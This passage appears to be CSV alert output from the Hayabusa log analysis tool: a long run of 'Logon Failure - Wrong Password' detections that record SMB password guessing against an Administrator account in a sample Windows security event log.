NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
